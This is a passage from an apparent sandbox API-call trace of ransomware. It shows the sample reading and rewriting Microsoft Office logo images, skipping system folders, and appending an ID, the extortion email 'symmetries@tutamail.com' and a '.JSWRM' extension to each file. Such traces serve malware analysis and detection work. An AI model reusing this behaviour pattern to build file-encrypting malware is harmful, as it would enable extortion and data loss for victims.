files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.673] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2273) returned 1 [0133.673] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.673] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0133.676] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.676] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0133.676] CloseHandle (hObject=0x238) returned 1 [0133.676] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.677] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-white_scale-140.png", cAlternateFileName="PO7FFA~1.PNG")) returned 1 [0133.677] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2=".") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="..") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="...") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="windows") returned -1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="recovery") returned -1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="system volume information") returned -1 [0133.678] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.679] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2913) returned 1 [0133.679] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.679] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb60, lpOverlapped=0x0) returned 1 [0133.681] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.681] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb60, lpOverlapped=0x0) returned 1 [0133.681] CloseHandle (hObject=0x238) returned 1 [0133.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.682] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd84, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-white_scale-180.png", cAlternateFileName="PO2276~1.PNG")) returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2=".") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="..") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="...") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="windows") returned -1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="recovery") returned -1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="system volume information") returned -1 [0133.682] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0133.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.683] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3460) returned 1 [0133.683] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.684] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd80, lpOverlapped=0x0) returned 1 [0133.685] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.685] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd80, lpOverlapped=0x0) returned 1 [0133.686] CloseHandle (hObject=0x238) returned 1 [0133.686] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.687] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-white_scale-80.png", cAlternateFileName="POWERP~2.PNG")) returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.687] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.688] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1960) returned 1 [0133.688] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.688] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7a0, lpOverlapped=0x0) returned 1 [0133.690] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.690] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7a0, lpOverlapped=0x0) returned 1 [0133.690] CloseHandle (hObject=0x238) returned 1 [0133.690] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.692] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a79652b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a79652b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7bc76a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x915, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.scale-100.png", cAlternateFileName="PO6386~1.PNG")) returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2=".") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="..") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="...") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="windows") returned -1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="recovery") returned -1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="perflogs") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="system volume information") returned -1 [0133.692] lstrcmpiW (lpString1="PowerPntLogo.scale-100.png", lpString2="msocache") returned 1 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x240fc0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.693] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2325) returned 1 [0133.693] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.693] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x910, lpOverlapped=0x0) returned 1 [0133.697] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.697] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x910, lpOverlapped=0x0) returned 1 [0133.697] CloseHandle (hObject=0x238) returned 1 [0133.697] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.698] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb1f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.scale-140.png", cAlternateFileName="POWERP~4.PNG")) returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2=".") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="..") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="...") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="windows") returned -1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="recovery") returned -1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="perflogs") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="system volume information") returned -1 [0133.698] lstrcmpiW (lpString1="PowerPntLogo.scale-140.png", lpString2="msocache") returned 1 [0133.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0133.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0133.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.699] CreateFileW 